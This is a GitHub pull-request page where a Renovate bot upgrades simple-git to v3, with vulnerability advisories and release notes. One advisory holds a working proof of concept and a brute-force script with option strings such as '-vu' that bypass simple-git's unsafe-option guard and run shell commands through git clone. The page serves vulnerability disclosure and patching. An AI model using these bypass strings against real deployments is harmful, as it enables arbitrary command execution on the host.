Skip to content

Update dependency simple-git to v3 [SECURITY]#90

Open
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/npm-simple-git-vulnerability
Open

Update dependency simple-git to v3 [SECURITY]#90
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/npm-simple-git-vulnerability

Conversation

@renovate
Copy link
Copy Markdown

@renovate renovate bot commented Mar 17, 2022

This PR contains the following updates:

Package Change Age Confidence
simple-git (source) ^2.38.0^3.0.0 age confidence

GitHub Vulnerability Alerts

CVE-2022-24433

The package simple-git before 3.3.0 is vulnerable to Command Injection via argument injection. When calling the .fetch(remote, branch, handlerFn) function, both the remote and branch parameters are passed to the git fetch subcommand. By injecting some git options, it was possible to get arbitrary command execution.

Severity
  • CVSS Score: 8.1 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-24066

simple-git (maintained as git-js named repository on GitHub) is a light weight interface for running git commands in any node.js application.The package simple-git before 3.5.0 are vulnerable to Command Injection due to an incomplete fix of CVE-2022-24433 which only patches against the git fetch attack vector. A similar use of the --upload-pack feature of git is also supported for git clone, which the prior fix didn't cover. A fix was released in simple-git@3.5.0.

Severity
  • CVSS Score: 8.1 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-25912

The package simple-git before 3.15.0 is vulnerable to Remote Code Execution (RCE) when enabling the ext transport protocol, which makes it exploitable via clone() method. This vulnerability exists due to an incomplete fix of CVE-2022-24066.

Severity
  • CVSS Score: 8.1 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-25860

Versions of the package simple-git before 3.16.0 are vulnerable to Remote Code Execution (RCE) via the clone(), pull(), push() and listRemote() methods, due to improper input sanitization. This vulnerability exists due to an incomplete fix of CVE-2022-25912.

Severity
  • CVSS Score: 9.8 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2026-28291

Summary

simple-git enables running native Git commands from JavaScript. Some commands accept options that allow executing another command; because this is very dangerous, execution is denied unless the user explicitly allows it. This vulnerability allows a malicious actor who can control the options to execute other commands even in a “safe” state where the user has not explicitly allowed them. The vulnerability was introduced by an incorrect patch for CVE-2022-25860. It is likely to affect all versions prior to and including 3.28.0.

Detail

This vulnerability was introduced by an incorrect patch for CVE-2022-25860.

It was reproduced in the following environment:


WSL Docker
node: v22.19.0
git: git version 2.39.5
simple-git: 3.28.0

The issue was not reproduced on Windows 11.

The -u option, like --upload-pack, allows a command to be executed.

Currently, the -u and --upload-pack options are blocked in the file simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts.

function preventUploadPack(arg: string, method: string) {
   if (/^\s*--(upload|receive)-pack/.test(arg)) {
      throw new GitPluginError(
         undefined,
         'unsafe',
         `Use of --upload-pack or --receive-pack is not permitted without enabling allowUnsafePack`
      );
   }

   if (method === 'clone' && /^\s*-u\b/.test(arg)) {
      throw new GitPluginError(
         undefined,
         'unsafe',
         `Use of clone with option -u is not permitted without enabling allowUnsafePack`
      );
   }

   if (method === 'push' && /^\s*--exec\b/.test(arg)) {
      throw new GitPluginError(
         undefined,
         'unsafe',
         `Use of push with option --exec is not permitted without enabling allowUnsafePack`
      );
   }
}

However, the problem is that command option parsing is quite flexible.

By brute forcing, I found various options that bypass the -u check.

[
  '--u', '--u',
  '-4u', '-6u',
  '-lu', '-nu',
  '-qu', '-su',
  '-vu'
]

All of the above are three-character options that allow command execution. They enable execution even when allowUnsafePack is explicitly set to false.

The depressing fact is that the options I found are probably only a tiny fraction of all possible option formats that enable command execution. In addition to the -u option, there is also the --upload-pack option and others, and some of the options I found can probably be extended to arbitrary length. Considering this, the number of option variants that enable command execution is probably infinite.

Therefore, I could not find an effective way to block all such cases. Personally, I think it is virtually impossible to block this vulnerability completely. To fully block it, one would have to faithfully emulate Git’s option parsing rules, and it’s doubtful whether that is feasible.

Just in case, I’ll share the brute-force code I used to find options that enable command execution.

const fs = require('fs');
const simpleGit = require('simple-git');

const TMP_DIR = './pwned/';
const ITER = 256;

function cleanTmpDir() {
    if (fs.existsSync(TMP_DIR)) {
        fs.rmSync(TMP_DIR, { recursive: true, force: true });
    }
    fs.mkdirSync(TMP_DIR, { recursive: true });
}

function getPwnedFiles() {
    const found = [];
    for (let i = 0; i < ITER; i++) {
        const fname1 = `${TMP_DIR}1_${i}`;
        const fname2 = `${TMP_DIR}2_${i}`;
        const fname3 = `${TMP_DIR}3_${i}`;
        if (fs.existsSync(fname1)) found.push(String.fromCharCode(i) + '-u');
        if (fs.existsSync(fname2)) found.push('-' + String.fromCharCode(i) + 'u');
        if (fs.existsSync(fname3)) found.push('-u' + String.fromCharCode(i));
    }
    return found;
}

async function runTest(runIdx) {
    const git = simpleGit();
    // 1. `${~}-u` Pattern
    for (let i = 0; i < ITER; i++) {
        try {
            await git.clone('./testrepo1', './testrepo2', [String.fromCharCode(i) + '-u', `sh -c \"touch ${TMP_DIR}1_${i}\"`]);
        } catch {}
    }
    // 2. `-${~}u` Pattern
    for (let i = 0; i < ITER; i++) {
        try {
            await git.clone('./testrepo1', './testrepo2', ['-' + String.fromCharCode(i) + 'u', `sh -c \"touch ${TMP_DIR}2_${i}\"`]);
        } catch {}
    }
    // 3. `-u${~}` Pattern
    for (let i = 0; i < ITER; i++) {
        try {
            await git.clone('./testrepo1', './testrepo2', ['-u' + String.fromCharCode(i), `sh -c \"touch ${TMP_DIR}3_${i}\"`]);
        } catch {}
    }
}

async function main() {
    cleanTmpDir();
    await runTest();

    const found = getPwnedFiles();
    
    console.log(found);
}

main();

PoC

The environment in which I succeeded is as follows. As long as the OS remains Linux, I suspect it will succeed reliably despite considerable variation in other factors.

WSL Docker
node: v22.19.0
git: git version 2.39.5
simple-git: 3.28.0

Create any git repository inside the testrepo1 folder. A very simple repository with a single commit and a single file is fine.

Run the following:

const { simpleGit } = require('simple-git');

async function main() {
    const git = await simpleGit({ unsafe: { allowUnsafePack: false } });
    await git.clone('./testrepo1', './testrepo2', [`-vu sh -c \"touch /tmp/pwned\"`]);
}

main();

This PoC explicitly configures allowUnsafePack to false. Of course, the same vulnerability occurs even without this option. An error is the expected behavior.

Check /tmp to confirm that pwned has been created.
If it failed, try replacing -vu with a different option from the list.

Impact

This vulnerability is likely to affect all versions prior to and including 3.28.0. This is because it appears to be a continuation of the series of four vulnerabilities previously found in simple-git (CVE-2022-24433, CVE-2022-24066, CVE-2022-25912, CVE-2022-25860).

Severity
  • CVSS Score: 8.1 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Release Notes

steveukx/git-js (simple-git)

v3.32.0

Compare Source

Minor Changes
  • 1effd8e: Enhances the unsafe plugin to block additional cases where the -u switch may be disguised
    along with other single character options.

    Thanks to @​JuHwiSang for identifying this as vulnerability.

Patch Changes
  • d5fd4fe: Use task runner for logging use of deprecated (already no-op) functions.

v3.31.1

Compare Source

Patch Changes
  • a44184f: Resolve NPM publish steps

v3.30.0

Compare Source

Minor Changes
  • bc77774: Correctly identify current branch name when using git.status in a cloned empty repo.

    Previously git.status would report the current branch name as No. Thank you to @​MaddyGuthridge for identifying this issue.

v3.29.0

Compare Source

Minor Changes
  • 240ec64: Support for absolute paths on Windows when using git.checkIngore, previously Windows would report
    paths with duplicate separators \\\\ between directories.

    Following this change all paths returned from git.checkIgnore will be normalized through node:path,
    this should have no impact on non-windows users where the git binary doesn't wrap absolute paths with
    quotes.

    Thanks to @​Maxim-Mazurok for reporting this issue.

  • 9872f84: Support the use of git.branch(['--show-current']) to limit the branch list to only the current branch.

    Thanks to @​peterbe for pointing out the use-case.

  • 5736bd8: Change to biome for lint and format

v3.28.0

Compare Source

Minor Changes
  • 2adf47d: Allow repeating git options like {'--opt': ['value1', 'value2']}

v3.27.0

Compare Source

Minor Changes
  • 52f767b: Add similarity to the DiffResultNameStatusFile interface used when fetching log/diff with the --name-status option.
  • 739b0d9: Diff summary includes original name of renamed files when run wiht the --name-status option.
  • bc90e7e: Fixes an issue with reporting name changes in the files array returned by git.status.
    Thank you @​mark-codesphere for the contribution.
Patch Changes
  • 03e1c64: Resolve error in log parsing when fields have empty values.

v3.26.0

Compare Source

Minor Changes
  • 28d545b: Upgrade build tools and typescript

v3.25.0

Compare Source

Minor Changes
  • 0a5378d: Add support for parsing count-objects
Patch Changes
  • 4aceb15: Upgrade dependencies and build tools

v3.24.0

Compare Source

Minor Changes
  • c355317: Enable the use of a two part custom binary

v3.23.0

Compare Source

Minor Changes
  • 9bfdf08: Bump package manager from yarn v1 to v4
Patch Changes
  • 8a3118d: Fixed a performance issue when parsing stat diff summaries
  • 9f1a174: Update build tools and workflows for Yarn 4 compatibility

v3.22.0

Compare Source

Minor Changes
  • df14065: add status to DiffResult when using --name-status

v3.21.0

Compare Source

Minor Changes
  • 709d80e: Add firstCommit utility interface
Patch Changes

v3.20.0

Compare Source

Minor Changes
  • 2eda817: Use pathspec in git.log to allow use of previously deleted files in file argument

v3.19.1

Compare Source

Patch Changes
  • 2ab1936: keep path splitter without path specs

v3.19.0

Compare Source

Minor Changes
  • f702b61: Create a utility to append pathspec / file lists to tasks through the TaskOptions array/object

v3.18.0

Compare Source

Minor Changes
  • 5100f04: Add new interface for showBuffer to allow using git show on binary files.
Patch Changes
  • f54cd0d: Examples and documentation for outputHandler

v3.17.0

Compare Source

Minor Changes
  • a63cfc2: Timeout plugin can now be configured to ignore data on either stdOut or stdErr in the git process when determining whether to kill the spawned process.

v3.16.1

Compare Source

Patch Changes
  • 066b228: Fix overly permissive regex in push parser

v3.16.0

Compare Source

Minor Changes
  • 97fde2c: Support the use of -B in place of the default -b in checkout methods
  • 0a623e5: Adds vulnerability detection to prevent use of --upload-pack and --receive-pack without explicitly opting in.
Patch Changes
  • ec97a39: Include restricting the use of git push --exec with other allowUnsafePack exclusions, thanks to @​stsewd for the suggestion.

v3.15.1

Compare Source

Patch Changes
  • de570ac: Resolves an issue whereby non-strings can be passed into the config switch detector.

v3.15.0

Compare Source

Minor Changes
  • 7746480: Disables the use of inline configuration arguments to prevent unitentionally allowing non-standard remote protocols without explicitly opting in to this practice with the new allowUnsafeProtocolOverride property having been enabled.
Patch Changes
  • 7746480: - Upgrade repo dependencies - lerna and jest
    • Include node@​19 in the test matrix

v3.14.1

Compare Source

Patch Changes
  • 5a2e7e4: Add version parsing support for non-numeric patches (including "built from source" style 1.11.GIT)

v3.14.0

Compare Source

Minor Changes
  • 19029fc: Create the abort plugin to allow cancelling all pending and future tasks.
  • 4259b26: Add .version to return git version information, including whether the git binary is installed.

v3.13.0

Compare Source

Minor Changes
  • 87b0d75: Increase the level of deprecation notices for use of simple-git/promise, which will be fully removed in the next major
  • d0dceda: Allow supplying just one of to/from in the options supplied to git.log
Patch Changes
  • 6b3e05c: Use shared test utilities bundle in simple-git tests, to enable consistent testing across packages in the future

v3.12.0

Compare Source

Minor Changes
  • bfd652b: Add a new configuration option to enable trimming white-space from the response to git.raw

v3.11.0

Compare Source

Minor Changes
  • 80d54bd: Added fields updated + deleted branch info to fetch response, closes #​823
Patch Changes
  • 75dfcb4: Add prettier configuration and apply formatting throughout.

v3.10.0

Compare Source

Minor Changes
  • 2f021e7: Support for importing as an ES module with TypeScript moduleResolution node16 or newer by adding
    simpleGit as a named export.

v3.9.0

Compare Source

Minor Changes
  • a0d4eb8: Branches that have been checked out as a linked work tree will now be included in the BranchSummary output, with a linkedWorkTree property set to true in the BranchSummaryBranch.

v3.8.0

Compare Source

Minor Changes
  • 25230cb: Support for additional log formats in diffSummary / log / stashList.

    Adds support for the --numstat, --name-only and --name-stat in addition to the existing --stat option.

Patch Changes
  • 2cfc16f: Update CI environments to run build and test in node v18, drop node v12 now out of life.
  • 13197f1: Update debug dependency to latest 4.x

v3.7.1

Compare Source

Patch Changes
  • adb4346: Resolves issue whereby renamed files no longer appear correctly in the response to git.status.

v3.7.0

Compare Source

Minor Changes
  • fa2c7f7: Enable the use of types when loading with module-resolution
Patch Changes
  • 3805f6b: Timeout plugin no longer keeps short lived processes alive until timeout is hit

v3.6.0

Compare Source

Minor Changes
  • f2fc5c9: Show full commit hash in a CommitResult, prior to this change git.commit would result in a partial hash in the commit property if core.abbrev is unset or has a value under 40. Following this change the commit property will contain the full commit hash.
Patch Changes
  • c4a2a13: chore(deps): bump minimist from 1.2.5 to 1.2.6

v3.5.0

Compare Source

Minor Changes
  • 2040de6: Resolves potential command injection vulnerability by preventing use of --upload-pack in git.clone

v3.4.0

Compare Source

Minor Changes
  • ed412ef: Use null separators in git.status to allow for non-ascii file names

v3.3.0

Compare Source

Minor Changes
  • d119ec4: Resolves potential command injection vulnerability by preventing use of --upload-pack in git.fetch

v3.2.6

Compare Source

Patch Changes
  • 80651d5: Resolve issue in prePublish script

v3.2.4

Compare Source

Patch Changes

v3.1.1

Compare Source

v3.1.0

Compare Source

Features
  • optionally include ignored files in StatusResult (70e6767), closes #​718
3.0.4 (2022-01-23)
Bug Fixes
3.0.3 (2022-01-20)
Bug Fixes
  • allow branches without labels (07a1388)
  • implement v3 deprecations (ed6d18e)
  • publish v3 as latest (5db4434)
3.0.2 (2022-01-18)
Bug Fixes
  • Backward compatibility - permit loading simple-git/promise with deprecation notice until mid-2022. (4413c47)
3.0.1 (2022-01-18)
Bug Fixes

v3.0.4

Compare Source

Features
  • optionally include ignored files in StatusResult (70e6767), closes #​718
3.0.4 (2022-01-23)
Bug Fixes
3.0.3 (2022-01-20)
Bug Fixes
  • allow branches without labels (07a1388)
  • implement v3 deprecations (ed6d18e)
  • publish v3 as latest (5db4434)
3.0.2 (2022-01-18)
Bug Fixes
  • Backward compatibility - permit loading simple-git/promise with deprecation notice until mid-2022. (4413c47)
3.0.1 (2022-01-18)
Bug Fixes

v3.0.3

Compare Source

Features
  • optionally include ignored files in StatusResult (70e6767), closes #​718
3.0.4 (2022-01-23)
Bug Fixes
3.0.3 (2022-01-20)
Bug Fixes
  • allow branches without labels (07a1388)
  • implement v3 deprecations (ed6d18e)
  • publish v3 as latest (5db4434)
3.0.2 (2022-01-18)
Bug Fixes
  • Backward compatibility - permit loading simple-git/promise with deprecation notice until mid-2022. (4413c47)
3.0.1 (2022-01-18)
Bug Fixes

v3.0.2

Compare Source

Features
  • optionally include ignored files in StatusResult (70e6767), closes #​718
3.0.4 (2022-01-23)
Bug Fixes
3.0.3 (2022-01-20)
Bug Fixes
  • allow branches without labels (07a1388)
  • implement v3 deprecations (ed6d18e)
  • publish v3 as latest (5db4434)
3.0.2 (2022-01-18)
Bug Fixes
  • Backward compatibility - permit loading simple-git/promise with deprecation notice until mid-2022. (4413c47)
3.0.1 (2022-01-18)
Bug Fixes

v3.0.1

Compare Source

Features
  • optionally include ignored files in StatusResult (70e6767), closes #​718
3.0.4 (2022-01-23)
Bug Fixes
3.0.3 (2022-01-20)
Bug Fixes
  • allow branches without labels (07a1388)
  • implement v3 deprecations (ed6d18e)
  • publish v3 as latest (5db4434)
3.0.2 (2022-01-18)
Bug Fixes
  • Backward compatibility - permit loading simple-git/promise with deprecation notice until mid-2022. (4413c47)
3.0.1 (2022-01-18)
Bug Fixes

v2.48.0

Compare Source

Features
  • StatusResult returned by git.status() should include detached state of the working copy. (#​695) (f464ebe)
Bug Fixes
  • Add example for empty commit message in git.commit() (61089cb)
2.47.1 (2021-11-29)
Bug Fixes
  • Add support for node@​17 in unit tests (0d3bf47)
  • Add support for node@​17 in unit tests (0d3bf47)

v2.47.1

Compare Source

v2.47.0

Compare Source

Features

v2.46.0

Compare Source

Features
  • completion plugin (#​684) (ecb7bd6)
  • completion plugin to allow configuring when simple-git determines the git tasks to be complete. (ecb7bd6)
2.45.1 (2021-09-04)
Bug Fixes
  • support progress events in locales other than western european character sets. (8cc42f8)

v2.45.1

Compare Source

v2.45.0

Compare Source

Features
  • Use author email field that respects mailmap (589d624)
Bug Fixes
  • getConfig always returns null despite values being present in configuration (9fd483a)

v2.44.0

Compare Source

Features
  • add support for getting the current value of a git configuration setting based on its name. (1d09204)

v2.43.0

Compare Source

Features
  • task callback types defined as single function type (b0a832c)

v2.42.0

Compare Source

Features
  • move log task to separate task builder (0712f86)
  • support scope argument in listConfig to return a specific scope's configuration (0685a8b)
2.41.2 (2021-07-29)
Bug Fixes
  • use literal true and false in DiffResultTextFile | DiffResultBinaryFile to aid type assertions. (8059099)
2.41.1 (2021-07-11)
Bug Fixes
  • Commit parsing should cater for file names with square brackets (ae81134)

v2.41.2

Compare Source

v2.41.1

Compare Source

v2.41.0

Compare Source

Features
  • allow setting the scope of git config add to work on the local, global or system configuration. (c7164e7)
  • allow setting the scope of git config add to work on the local, global or system configuration. (00ada06)

v2.40.0

Compare Source

Features
  • create the spawnOptions plugin to allow setting uid / gid owner for the spawned git child processes. (cc70220)
2.39.1 (2021-06-09)
Bug Fixes
  • add types and tests for the documented .exec API (#​631) (c9207da)
  • add types and tests for the documented .exec API (c9207da)
  • updates the documentation for mergeFromTo to more closely represent its functionality (see #​50 for the original requirement). (dd2244e)

v2.39.1

Compare Source

v2.39.0

Compare Source

Features
  • git.cwd can now be configured to affect just the chain rather than root instance. (4110662)
2.38.1 (2021-05-09)
Bug Fixes
  • Export GitPluginError from the main package. (2aa7e55), closes #​616

v2.38.1

Compare Source


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot force-pushed the renovate/npm-simple-git-vulnerability branch from 1c3d729 to 05110ae Compare April 6, 2022 13:15
@renovate renovate bot changed the title Update dependency simple-git to v3 [SECURITY] Update dependency simple-git to v3 [SECURITY] - autoclosed May 12, 2022
@renovate renovate bot closed this May 12, 2022
@renovate renovate bot deleted the renovate/npm-simple-git-vulnerability branch May 12, 2022 04:40
@renovate renovate bot changed the title Update dependency simple-git to v3 [SECURITY] - autoclosed Update dependency simple-git to v3 [SECURITY] May 12, 2022
@renovate renovate bot restored the renovate/npm-simple-git-vulnerability branch May 12, 2022 10:03
@renovate renovate bot reopened this May 12, 2022
@renovate renovate bot force-pushed the renovate/npm-simple-git-vulnerability branch from 05110ae to c384e6c Compare November 20, 2022 17:51
@renovate renovate bot changed the title Update dependency simple-git to v3 [SECURITY] fix(deps): update dependency simple-git to v3 [security] Nov 20, 2022
@renovate renovate bot changed the title fix(deps): update dependency simple-git to v3 [security] fix(deps): update dependency simple-git to v3 [security] - autoclosed Dec 12, 2022
@renovate renovate bot closed this Dec 12, 2022
@renovate renovate bot deleted the renovate/npm-simple-git-vulnerability branch December 12, 2022 02:34
@renovate renovate bot changed the title fix(deps): update dependency simple-git to v3 [security] - autoclosed fix(deps): update dependency simple-git to v3 [security] Dec 12, 2022
@renovate renovate bot restored the renovate/npm-simple-git-vulnerability branch December 12, 2022 05:34
@renovate renovate bot reopened this Dec 12, 2022
@renovate renovate bot changed the title fix(deps): update dependency simple-git to v3 [security] fix(deps): update dependency simple-git to v3 [security] - autoclosed Dec 16, 2022
@renovate renovate bot closed this Dec 16, 2022
@renovate renovate bot deleted the renovate/npm-simple-git-vulnerability branch December 16, 2022 03:49
@renovate renovate bot changed the title fix(deps): update dependency simple-git to v3 [security] - autoclosed fix(deps): update dependency simple-git to v3 [security] Dec 16, 2022
@renovate renovate bot reopened this Dec 16, 2022
@renovate renovate bot restored the renovate/npm-simple-git-vulnerability branch December 16, 2022 06:21
@renovate renovate bot changed the title fix(deps): update dependency simple-git to v3 [security] Update dependency simple-git to v3 [SECURITY] Dec 17, 2022
@renovate renovate bot changed the title Update dependency simple-git to v3 [SECURITY] fix(deps): update dependency simple-git to v3 [security] Dec 17, 2022
@renovate renovate bot force-pushed the renovate/npm-simple-git-vulnerability branch from c384e6c to c700a81 Compare January 5, 2023 17:36
@renovate renovate bot changed the title fix(deps): update dependency simple-git to v3 [security] fix(deps): update dependency simple-git to v3 [security] - autoclosed Feb 5, 2023
@renovate renovate bot closed this Feb 5, 2023
@renovate renovate bot deleted the renovate/npm-simple-git-vulnerability branch February 5, 2023 02:22
@renovate renovate bot changed the title fix(deps): update dependency simple-git to v3 [security] - autoclosed fix(deps): update dependency simple-git to v3 [security] Feb 5, 2023
@renovate renovate bot reopened this Feb 5, 2023
@renovate renovate bot restored the renovate/npm-simple-git-vulnerability branch February 5, 2023 04:49
@renovate renovate bot force-pushed the renovate/npm-simple-git-vulnerability branch from c700a81 to 40de567 Compare June 3, 2025 08:00
@renovate renovate bot force-pushed the renovate/npm-simple-git-vulnerability branch from 40de567 to 5fa7e5f Compare August 10, 2025 15:36
@renovate renovate bot force-pushed the renovate/npm-simple-git-vulnerability branch from 5fa7e5f to 29ee3ec Compare September 25, 2025 18:06
@renovate renovate bot force-pushed the renovate/npm-simple-git-vulnerability branch from 29ee3ec to 6f99584 Compare November 10, 2025 21:40
@renovate renovate bot force-pushed the renovate/npm-simple-git-vulnerability branch from 6f99584 to 9e42551 Compare February 17, 2026 18:30
@renovate renovate bot force-pushed the renovate/npm-simple-git-vulnerability branch from 9e42551 to 51ad1e8 Compare March 5, 2026 16:54
@renovate renovate bot force-pushed the renovate/npm-simple-git-vulnerability branch from 51ad1e8 to 1a9fabe Compare March 13, 2026 12:53
@renovate renovate bot changed the title fix(deps): update dependency simple-git to v3 [security] fix(deps): update dependency simple-git to v3 [security] - autoclosed Mar 27, 2026
@renovate renovate bot closed this Mar 27, 2026
@renovate renovate bot deleted the renovate/npm-simple-git-vulnerability branch March 27, 2026 02:51
@renovate renovate bot changed the title fix(deps): update dependency simple-git to v3 [security] - autoclosed fix(deps): update dependency simple-git to v3 [security] Mar 30, 2026
@renovate renovate bot reopened this Mar 30, 2026
@renovate renovate bot force-pushed the renovate/npm-simple-git-vulnerability branch from 1a9fabe to 37b16bc Compare March 30, 2026 18:57
@renovate renovate bot force-pushed the renovate/npm-simple-git-vulnerability branch from 37b16bc to 0e87488 Compare April 8, 2026 15:54
@renovate renovate bot changed the title fix(deps): update dependency simple-git to v3 [security] Update dependency simple-git to v3 [SECURITY] Apr 8, 2026
@renovate renovate bot force-pushed the renovate/npm-simple-git-vulnerability branch from 0e87488 to a85887b Compare April 13, 2026 19:36
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants